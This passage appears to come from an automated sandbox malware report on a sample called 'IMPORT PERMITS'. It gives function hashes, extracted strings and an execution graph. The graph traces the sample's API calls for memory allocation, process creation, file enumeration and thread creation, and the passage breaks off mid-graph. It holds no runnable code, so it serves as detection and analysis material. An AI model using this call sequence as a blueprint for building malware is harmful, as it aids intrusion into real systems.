                                                                                                                                • Instruction ID: 6075f36b986e737bceeb5581a37f86dada096b8e536bf61eb58d3d8429467c97
                                                                                                                                • Opcode Fuzzy Hash: 0f8733e55a61858505011a77170340b99865de0471c335688fc05fcb437a98f8
                                                                                                                                • Instruction Fuzzy Hash: 9A516E3160021ABAEF10ABA9EC95FBE77A8EF14715F04049FD509A72B1EB709E458F50
                                                                                                                                Function 014B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                • Instruction ID: 927ebe366d2ff26bac203d02096a2f9a75055a40fda8222d06c3517b20a8938d
                                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                • Instruction Fuzzy Hash: 38022571508342AFD705CF19C490AAFBBE5EFD8710F41892EFA894B264DB31E945CB62
                                                                                                                                Function 0142B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-$0$0
                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                • Instruction ID: e7ab0a6ee1ad5f8f85b2224bea3a03d0f928fcaf4b9023cc5a056e561a8beca7
                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                • Instruction Fuzzy Hash: 4881C130E052698EEF258E6CC8507FEBBB1EF85320F98415BD865A73A1C77488C1CB52
                                                                                                                                Function 014920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                • Opcode ID: 9e52dcc75b3dd8f74c23e6053931db70cbd6bc4382ae73f6e0a8eeb024dc4775
                                                                                                                                • Instruction ID: 7efd964a9fbec818e44138362cfd6ddde2f4537119b09494e8531bb78393c449
                                                                                                                                • Opcode Fuzzy Hash: 9e52dcc75b3dd8f74c23e6053931db70cbd6bc4382ae73f6e0a8eeb024dc4775
                                                                                                                                • Instruction Fuzzy Hash: CC2153BAA00119ABDB10DF69D841EAFBFF8EF58654F45011BE905D3214E770D9118BA1
                                                                                                                                Function 0140F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 0145031E
                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014502E7
                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014502BD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                • Opcode ID: f9d555e8d86369ca556d0437d2eb533fbd8fbe492756b483c89979f58ad69a9b
                                                                                                                                • Instruction ID: 25f766ff5fa29ab00c18cdf0bec653ed9ae48002389cc119f9cebf5d5e086930
                                                                                                                                • Opcode Fuzzy Hash: f9d555e8d86369ca556d0437d2eb533fbd8fbe492756b483c89979f58ad69a9b
                                                                                                                                • Instruction Fuzzy Hash: 75E19E356047419FD726CF29C884B2ABBE0BB84314F140A6EF9958B3F2D775D94ACB42
                                                                                                                                Function 0141BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 01457BAC
                                                                                                                                • RTL: Resource at %p, xrefs: 01457B8E
                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01457B7F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 0-871070163
                                                                                                                                • Opcode ID: 303af6dd3cf8994dcc7c7a41563326f2a9cad2c3d44aada3b0f4487d1fa3f038
                                                                                                                                • Instruction ID: 82409cb1f453da9dba0228029d00047a37d1f189b6ba6e6b2ec3bf56036d8556
                                                                                                                                • Opcode Fuzzy Hash: 303af6dd3cf8994dcc7c7a41563326f2a9cad2c3d44aada3b0f4487d1fa3f038
                                                                                                                                • Instruction Fuzzy Hash: 2D41E4317007029FD720CE2AD850B6BB7E5EF98725F100A2EF956DB7A1DB71E8058B91
                                                                                                                                Function 0141B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0145728C
                                                                                                                                Strings
                                                                                                                                • RTL: Re-Waiting, xrefs: 014572C1
                                                                                                                                • RTL: Resource at %p, xrefs: 014572A3
                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01457294
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                • Opcode ID: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
                                                                                                                                • Instruction ID: ca3ebb3c647a6a9d02252877bf61e769ea36804eec73d08108d3bde2a832e3f5
                                                                                                                                • Opcode Fuzzy Hash: 861e3b1bfda604aac3435d225d7b3c84582cee0418e2fa1f011e7b6222065e21
                                                                                                                                • Instruction Fuzzy Hash: 9B41E131740202ABC720CF2ACC41B6AB7A5FBA4755F10462EFD55EB761DB31E8468BD1
                                                                                                                                Function 01492300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                • Opcode ID: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
                                                                                                                                • Instruction ID: 1a74f6beacafb2a4ceceb9b51eeb09fea572b3b54a610d5cf32c17e022442fe0
                                                                                                                                • Opcode Fuzzy Hash: 668beb27cf55fd061ba03145bb6718f2c450fb942acca00be84e945fb2642748
                                                                                                                                • Instruction Fuzzy Hash: 2E315772A00119AFDF60DE3DDC40FEF7BF8EB54610F44455AE949E3250EB709A458BA0
                                                                                                                                Function 01427D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __aulldvrm
                                                                                                                                • String ID: +$-
                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction ID: ca0aa5647f3562ae376bd7238e33250a16291b3a5f8b0be8323070905b6691c4
                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                • Instruction Fuzzy Hash: D691C570E042369BDB24CF6DC891ABFBBA1AF64322F95451BE955E73E0D73089C18721
                                                                                                                                Function 013E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                • Opcode ID: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                                • Instruction ID: 6c4d236ee55dfcc3232aafd40b56e93a5c682e715b5c0407d8a43595434a24b4
                                                                                                                                • Opcode Fuzzy Hash: dddc6f0145fe4c0e6ccd5abab36da600661536835c26219a9d906b92f3cd8355
                                                                                                                                • Instruction Fuzzy Hash: 1D812A71D002699BDB31CB54DC44BEEB7B8AB08754F0041EAEA1DB7290D7709E84CFA0

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:2.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                Signature Coverage:1.5%
                                                                                                                                Total number of Nodes:461
                                                                                                                                Total number of Limit Nodes:75
                                                                                                                                execution_graph 99422 4159c1 99423 4159c9 99422->99423 99424 415a16 99423->99424 99427 415750 99423->99427 99432 415748 99423->99432 99428 415780 99427->99428 99439 417c70 99427->99439 99431 4157ac 99428->99431 99443 417bf0 99428->99443 99431->99423 99433 415712 99432->99433 99434 41574d 99432->99434 99433->99423 99435 417c70 LdrInitializeThunk 99434->99435 99436 415780 99435->99436 99437 417bf0 2 API calls 99436->99437 99438 4157ac 99436->99438 99437->99436 99438->99423 99440 417c83 99439->99440 99450 428430 99440->99450 99442 417cae 99442->99428 99444 417c34 99443->99444 99449 417c55 99444->99449 99456 428200 99444->99456 99446 417c45 99447 417c61 99446->99447 99461 428f20 99446->99461 99447->99428 99449->99428 99451 4284b1 99450->99451 99452 42845e 99450->99452 99455 2d12dd0 LdrInitializeThunk 99451->99455 99452->99442 99453 4284d6 99453->99442 99455->99453 99457 42827d 99456->99457 99458 42822b 99456->99458 99464 2d14650 LdrInitializeThunk 99457->99464 99458->99446 99459 4282a2 99459->99446 99462 428f3d 99461->99462 99463 428f4e NtClose 99462->99463 99463->99449 99464->99459 99465 40b180 99466 40b192 99465->99466 99469 42af70 99466->99469 99468 40c7f1 99472 429090 99469->99472 99471 42afa1 99471->99468 99473 429128 99472->99473 99475 4290be 99472->99475 99474 42913e NtAllocateVirtualMemory 99473->99474 99474->99471 99475->99471 99476 2d12ad0 LdrInitializeThunk 99477 41a8c0 99482 41a5d0 99477->99482 99479 41a8cd 99496 41a240 99479->99496 99481 41a8e9 99483 41a5f5 99482->99483 99507 417ee0 99483->99507 99486 41a740 99486->99479 99488 41a757 99488->99479 99489 41a74e 99489->99488 99491 41a845 99489->99491 99526 419c90 99489->99526 99493 41a8aa 99491->99493 99535 41a000 99491->99535 99539 42b000 99493->99539 99497 41a256 99496->99497 99500 41a261 99496->99500 99498 42b0e0 RtlAllocateHeap 99497->99498 99498->99500 99499 41a288 99499->99481 99500->99499 99501 417ee0 GetFileAttributesW 99500->99501 99502 41a5a2 99500->99502 99505 419c90 RtlFreeHeap 99500->99505 99506 41a000 RtlFreeHeap 99500->99506 99501->99500 99503 41a5bb 99502->99503 99504 42b000 RtlFreeHeap 99502->99504 99503->99481 99504->99503 99505->99500 99506->99500 99508 417f01 99507->99508 99509 417f08 GetFileAttributesW 99508->99509 99510 417f13 99508->99510 99509->99510 99510->99486 99511 422ee0 99510->99511 99512 422eee 99511->99512 99513 422ef5 99511->99513 99512->99489 99542 4140f0 99513->99542 99515 422f2a 99516 422f39 99515->99516 99552 4229c0 LdrLoadDll LdrLoadDll 99515->99552 99522 4230e7 99516->99522 99549 42b0e0 99516->99549 99519 422f52 99520 4230dd 99519->99520 99519->99522 99523 422f6e 99519->99523 99521 42b000 RtlFreeHeap 99520->99521 99520->99522 99521->99522 99522->99489 99523->99522 99524 42b000 RtlFreeHeap 99523->99524 99525 4230d1 99524->99525 99525->99489 99527 419cb6 99526->99527 99557 41d6d0 99527->99557 99529 419d28 99531 419ea4 99529->99531 99532 419d46 99529->99532 99530 419e89 99530->99489 99531->99530 99534 419b50 RtlFreeHeap 99531->99534 99532->99530 99562 419b50 99532->99562 99534->99531 99536 41a026 99535->99536 99537 41d6d0 RtlFreeHeap 99536->99537 99538 41a0ad 99537->99538 99538->99491 99570 4292b0 99539->99570 99541 41a8b1 99541->99479 99543 414114 99542->99543 99544 41411b 99543->99544 99545 41413a 99543->99545 99553 42c480 LdrLoadDll 99543->99553 99544->99515 99547 414150 LdrLoadDll 99545->99547 99548 414167 99545->99548 99547->99548 99548->99515 99554 429260 99549->99554 99551 42b0fb 99551->99519 99552->99516 99553->99545 99555 42927d 99554->99555 99556 42928e RtlAllocateHeap 99555->99556 99556->99551 99558 41d6f4 99557->99558 99559 41d6fe 99558->99559 99560 42b000 RtlFreeHeap 99558->99560 99559->99529 99561 41d741 99560->99561 99561->99529 99563 419b6d 99562->99563 99566 41d750 99563->99566 99565 419c73 99565->99532 99567 41d774 99566->99567 99568 41d81e 99567->99568 99569 42b000 RtlFreeHeap 99567->99569 99568->99565 99569->99568 99571 4292cd 99570->99571 99572 4292de RtlFreeHeap 99571->99572 99572->99541 99578 428c00 99579 428cb7 99578->99579 99581 428c2f 99578->99581 99580 428ccd NtCreateFile 99579->99580 99582 412d03 99587 4178f0 99582->99587 99584 412d2f 99586 428f20 NtClose 99586->99584 99588 412d13 99587->99588 99589 41790a 99587->99589 99588->99584 99588->99586 99593 4285d0 99589->99593 99592 428f20 NtClose 99592->99588 99594 4285ea 99593->99594 99597 2d135c0 LdrInitializeThunk 99594->99597 99595 4179da 99595->99592 99597->99595 99603 409dd0 99605 40a016 99603->99605 99606 40a2d2 99605->99606 99607 42ac70 99605->99607 99608 42ac93 99607->99608 99613 404090 99608->99613 99610 42ac9f 99611 42acd8 99610->99611 99616 425170 99610->99616 99611->99606 99615 40409d 99613->99615 99620 412e10 99613->99620 99615->99610 99617 4251d2 99616->99617 99619 4251df 99617->99619 99638 4115f0 99617->99638 99619->99611 99621 412e2d 99620->99621 99623 412e46 99621->99623 99624 4299a0 99621->99624 99623->99615 99626 4299ba 99624->99626 99625 4299e9 99625->99623 99626->99625 99631 428530 99626->99631 99629 42b000 RtlFreeHeap 99630 429a62 99629->99630 99630->99623 99632 42854a 99631->99632 99635 2d12c0a 99632->99635 99633 428576 99633->99629 99636 2d12c11 99635->99636 99637 2d12c1f LdrInitializeThunk 99635->99637 99636->99633 99637->99633 99639 41162b 99638->99639 99654 417a00 99639->99654 99641 411633 99642 411906 99641->99642 99643 42b0e0 RtlAllocateHeap 99641->99643 99642->99619 99644 411649 99643->99644 99645 42b0e0 RtlAllocateHeap 99644->99645 99646 41165a 99645->99646 99647 42b0e0 RtlAllocateHeap 99646->99647 99648 41166b 99647->99648 99653 4116ff 99648->99653 99669 4165b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99648->99669 99650 4140f0 2 API calls 99651 4118b2 99650->99651 99665 427ab0 99651->99665 99653->99650 99655 417a2c 99654->99655 99656 4178f0 2 API calls 99655->99656 99657 417a4f 99656->99657 99658 417a71 99657->99658 99659 417a59 99657->99659 99660 417a8d 99658->99660 99663 428f20 NtClose 99658->99663 99661 417a64 99659->99661 99662 428f20 NtClose 99659->99662 99660->99641 99661->99641 99662->99661 99664 417a83 99663->99664 99664->99641 99666 427b12 99665->99666 99668 427b1f 99666->99668 99670 411920 99666->99670 99668->99642 99669->99653 99686 417cd0 99670->99686 99672 411940 99681 411e83 99672->99681 99690 420cb0 99672->99690 99675 411b4f 99698 42c1d0 99675->99698 99676 41199b 99676->99681 99693 42c0a0 99676->99693 99678 411bb1 99680 417c70 LdrInitializeThunk 99678->99680 99678->99681 99683 410450 LdrInitializeThunk 99678->99683 99679 411b64 99679->99678 99704 410450 99679->99704 99680->99678 99681->99668 99683->99678 99684 417c70 LdrInitializeThunk 99685 411d03 99684->99685 99685->99678 99685->99684 99687 417cdd 99686->99687 99688 417d05 99687->99688 99689 417cfe SetErrorMode 99687->99689 99688->99672 99689->99688 99691 42af70 NtAllocateVirtualMemory 99690->99691 99692 420cd1 99691->99692 99692->99676 99694 42c0b0 99693->99694 99695 42c0b6 99693->99695 99694->99675 99696 42b0e0 RtlAllocateHeap 99695->99696 99697 42c0dc 99696->99697 99697->99675 99699 42c140 99698->99699 99700 42c19d 99699->99700 99701 42b0e0 RtlAllocateHeap 99699->99701 99700->99679 99702 42c17a 99701->99702 99703 42b000 RtlFreeHeap 99702->99703 99703->99700 99707 4291c0 99704->99707 99708 4291da 99707->99708 99711 2d12c70 LdrInitializeThunk 99708->99711 99709 410472 99709->99685 99711->99709 99712 41fc90 99713 41fcb3 99712->99713 99714 4140f0 2 API calls 99713->99714 99715 41fcd7 99714->99715 99716 416e90 99717 416ea5 99716->99717 99719 416eff 99716->99719 99717->99719 99720 41ae00 99717->99720 99721 41ae26 99720->99721 99722 41b044 99721->99722 99747 429340 99721->99747 99722->99719 99724 41aea2 99724->99722 99725 42c1d0 2 API calls 99724->99725 99726 41aec1 99725->99726 99726->99722 99727 41af89 99726->99727 99728 428530 LdrInitializeThunk 99726->99728 99729 4156d0 LdrInitializeThunk 99727->99729 99731 41afa2 99727->99731 99730 41af20 99728->99730 99729->99731 99730->99727 99735 41af29 99730->99735 99734 41b02c 99731->99734 99753 4280a0 99731->99753 99732 41af71 99733 417c70 LdrInitializeThunk 99732->99733 99737 41af7f 99733->99737 99741 417c70 LdrInitializeThunk 99734->99741 99735->99722 99735->99732 99736 41af55 99735->99736 99750 4156d0 99735->99750 99768 424300 LdrInitializeThunk 99736->99768 99737->99719 99742 41b03a 99741->99742 99742->99719 99743 41b003 99758 428150 99743->99758 99745 41b01d 99763 4282b0 99745->99763 99748 42935d 99747->99748 99749 42936e CreateProcessInternalW 99748->99749 99749->99724 99752 41570e 99750->99752 99769 428700 99750->99769 99752->99736 99754 428120 99753->99754 99755 4280ce 99753->99755 99775 2d139b0 LdrInitializeThunk 99754->99775 99755->99743 99756 428145 99756->99743 99759 4281cd 99758->99759 99761 42817b 99758->99761 99776 2d14340 LdrInitializeThunk 99759->99776 99760 4281f2 99760->99745 99761->99745 99764 42832d 99763->99764 99766 4282db 99763->99766 99777 2d12fb0 LdrInitializeThunk 99764->99777 99765 428352 99765->99734 99766->99734 99768->99732 99770 4287b1 99769->99770 99772 42872f 99769->99772 99774 2d12d10 LdrInitializeThunk 99770->99774 99771 4287f6 99771->99752 99772->99752 99774->99771 99775->99756 99776->99760 99777->99765 99778 41f390 99779 41f3f4 99778->99779 99807 415e50 99779->99807 99781 41f52e 99782 41f527 99782->99781 99814 415f60 99782->99814 99784 41f6d3 99785 41f5aa 99785->99784 99786 41f6e2 99785->99786 99818 41f170 99785->99818 99787 428f20 NtClose 99786->99787 99789 41f6ec 99787->99789 99790 41f5e6 99790->99786 99791 41f5f1 99790->99791 99792 42b0e0 RtlAllocateHeap 99791->99792 99793 41f61a 99792->99793 99794 41f623 99793->99794 99795 41f639 99793->99795 99796 428f20 NtClose 99794->99796 99827 41f060 CoInitialize 99795->99827 99798 41f62d 99796->99798 99799 41f647 99830 4289b0 99799->99830 99801 41f6c2 99802 428f20 NtClose 99801->99802 99803 41f6cc 99802->99803 99804 42b000 RtlFreeHeap 99803->99804 99804->99784 99805 41f665 99805->99801 99806 4289b0 LdrInitializeThunk 99805->99806 99806->99805 99809 415e83 99807->99809 99808 415ea7 99808->99782 99809->99808 99834 428a60 99809->99834 99811 415eca 99811->99808 99812 428f20 NtClose 99811->99812 99813 415f4a 99812->99813 99813->99782 99815 415f85 99814->99815 99839 428840 99815->99839 99819 41f18c 99818->99819 99820 4140f0 2 API calls 99819->99820 99822 41f1aa 99820->99822 99821 41f1b3 99821->99790 99822->99821 99823 4140f0 2 API calls 99822->99823 99824 41f27e 99823->99824 99825 4140f0 2 API calls 99824->99825 99826 41f2db 99824->99826 99825->99826 99826->99790 99828 41f0c5 99827->99828 99829 41f15b CoUninitialize 99828->99829 99829->99799 99831 4289cd 99830->99831 99844 2d12ba0 LdrInitializeThunk 99831->99844 99832 4289fd 99832->99805 99835 428a7d 99834->99835 99838 2d12ca0 LdrInitializeThunk 99835->99838 99836 428aa9 99836->99811 99838->99836 99840 42885d 99839->99840 99843 2d12c60 LdrInitializeThunk 99840->99843 99841 415ff9 99841->99785 99843->99841 99844->99832 99850 411f56 99851 411eaf 99850->99851 99852 411f77 99850->99852 99853 411f14 99851->99853 99854 411ed6 99851->99854 99855 428530 LdrInitializeThunk 99851->99855 99858 428fc0 99854->99858 99855->99854 99857 411eeb 99859 429052 99858->99859 99861 428fee 99858->99861 99863 2d12e80 LdrInitializeThunk 99859->99863 99860 429083 99860->99857 99861->99857 99863->99860 99864 41835b 99866 418365 99864->99866 99865 41834b 99866->99865 99868 416c30 99866->99868 99869 416c46 99868->99869 99871 416c7f 99868->99871 99869->99871 99872 416aa0 LdrLoadDll LdrLoadDll 99869->99872 99871->99865 99872->99871 99873 41235a 99874 415e50 2 API calls 99873->99874 99875 412393 99874->99875 99876 41975c 99877 419763 99876->99877 99879 41976e 99876->99879 99878 42b0e0 RtlAllocateHeap 99877->99878 99878->99879 99880 419796 99879->99880 99881 42b000 RtlFreeHeap 99879->99881 99881->99880 99883 41c160 99885 41c189 99883->99885 99884 41c28d 99885->99884 99886 41c233 FindFirstFileW 99885->99886 99886->99884 99888 41c24e 99886->99888 99887 41c274 FindNextFileW 99887->99888 99889 41c286 FindClose 99887->99889 99888->99887 99889->99884 99890 416920 99891 41694a 99890->99891 99894 417aa0 99891->99894 99893 416971 99895 417abd 99894->99895 99901 428620 99895->99901 99897 417b0d 99898 417b14 99897->99898 99899 428700 LdrInitializeThunk 99897->99899 99898->99893 99900 417b3d 99899->99900 99900->99893 99902 4286be 99901->99902 99903 42864e 99901->99903 99906 2d12f30 LdrInitializeThunk 99902->99906 99903->99897 99904 4286f7 99904->99897 99906->99904 99907 4284e0 99908 4284fd 99907->99908 99911 2d12df0 LdrInitializeThunk 99908->99911 99909 428525 99911->99909 99912 4212e0 99913 4212fc 99912->99913 99914 421324 99913->99914 99915 421338 99913->99915 99916 428f20 NtClose 99914->99916 99917 428f20 NtClose 99915->99917 99918 42132d 99916->99918 99919 421341 99917->99919 99922 42b120 RtlAllocateHeap 99919->99922 99921 42134c 99922->99921 99923 428360 99924 4283ef 99923->99924 99926 42838b 99923->99926 99928 2d12ee0 LdrInitializeThunk 99924->99928 99925 428420 99928->99925 99929 425be0 99930 425c3a 99929->99930 99932 425c47 99930->99932 99933 423600 99930->99933 99934 42af70 NtAllocateVirtualMemory 99933->99934 99936 42363e 99934->99936 99935 42374e 99935->99932 99936->99935 99937 4140f0 2 API calls 99936->99937 99939 423684 99937->99939 99938 4236d0 Sleep 99938->99939 99939->99935 99939->99938 99940 409d70 99942 409d7f 99940->99942 99941 409dc0 99942->99941 99943 409dad CreateThread 99942->99943 99944 409db8 99943->99944 99945 416cb0 99946 416cc9 99945->99946 99954 416d1c 99945->99954 99948 428f20 NtClose 99946->99948 99946->99954 99947 416e54 99951 416ce4 99948->99951 99950 416e2e 99950->99947 99957 4162b0 NtClose LdrInitializeThunk LdrInitializeThunk 99950->99957 99955 4160e0 NtClose LdrInitializeThunk LdrInitializeThunk 99951->99955 99954->99947 99956 4160e0 NtClose LdrInitializeThunk LdrInitializeThunk 99954->99956 99955->99954 99956->99950 99957->99947 99960 4109b0 99961 4109bd 99960->99961 99962 4140f0 2 API calls 99961->99962 99963 4109e8 99962->99963 99964 410a2d 99963->99964 99965 410a1c PostThreadMessageW 99963->99965 99965->99964 99966 421670 99968 421689 99966->99968 99967 4216d1 99969 42b000 RtlFreeHeap 99967->99969 99968->99967 99971 421711 99968->99971 99973 421716 99968->99973 99970 4216e1 99969->99970 99972 42b000 RtlFreeHeap 99971->99972 99972->99973 99974 428e70 99975 428eea 99974->99975 99977 428e9e 99974->99977 99976 428f00 NtDeleteFile 99975->99976 99978 428d70 99979 428e1a 99978->99979 99981 428d9e 99978->99981 99980 428e30 NtReadFile 99979->99980 99982 4255b0 99984 425615 99982->99984 99983 425650 99984->99983 99987 420f80 99984->99987 99986 425632 99988 420f26 99987->99988 99989 428f20 NtClose 99988->99989 99990 420f6f 99989->99990 99990->99986 99991 41be3c 99993 42b0e0 RtlAllocateHeap 99991->99993 99992 41be41 99993->99992

                                                                                                                                Executed Functions

                                                                                                                                Function 00409DD0 Relevance: 26.6, Strings: 21, Instructions: 326COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 30 409dd0-40a00c 31 40a016-40a026 30->31 31->31 32 40a028-40a02f 31->32 33 40a03a-40a043 32->33 34 40a045-40a058 33->34 35 40a05a-40a06f 33->35 34->33 37 40a07a-40a081 35->37 38 40a083-40a08c 37->38 39 40a08e-40a09a 37->39 38->37 41 40a0b9-40a0c7 39->41 42 40a09c-40a0b7 39->42 43 40a0d2-40a0db 41->43 42->39 44 40a0e9-40a0f2 43->44 45 40a0dd-40a0e7 43->45 47 40a293-40a29a 44->47 48 40a0f8-40a0fc 44->48 45->43 51 40a2c4-40a2cb 47->51 52 40a29c-40a2ae 47->52 49 40a117-40a11e 48->49 50 40a0fe-40a115 48->50 57 40a129-40a12f 49->57 50->48 53 40a329-40a330 51->53 54 40a2cd call 42ac70 51->54 55 40a2b0-40a2b4 52->55 56 40a2b5-40a2b7 52->56 61 40a33b-40a341 53->61 67 40a2d2-40a2d9 54->67 55->56 62 40a2c2 56->62 63 40a2b9-40a2bf 56->63 58 40a131-40a13a 57->58 59 40a147-40a14a 57->59 64 40a145 58->64 65 40a13c-40a142 58->65 66 40a150-40a16b 59->66 68 40a343-40a34c 61->68 69 40a34e-40a355 61->69 62->47 63->62 64->57 65->64 66->66 74 40a16d-40a17c 66->74 72 40a2e4-40a2ed 67->72 68->61 70 40a360-40a366 69->70 75 40a368-40a378 70->75 76 40a37a-40a384 70->76 77 40a2fa-40a301 72->77 78 40a2ef-40a2f8 72->78 79 40a1b4-40a1c5 74->79 80 40a17e-40a185 74->80 75->70 81 40a386-40a3a5 76->81 82 40a3b8-40a3c1 76->82 84 40a30c-40a312 77->84 78->72 88 40a1d0-40a1d4 79->88 86 40a187-40a199 80->86 87 40a1af 80->87 91 40a3b6 81->91 92 40a3a7-40a3b0 81->92 84->53 95 40a314-40a327 84->95 93 40a1a0-40a1a2 86->93 94 40a19b-40a19f 86->94 87->47 89 40a1f6-40a200 88->89 90 40a1d6-40a1f4 88->90 96 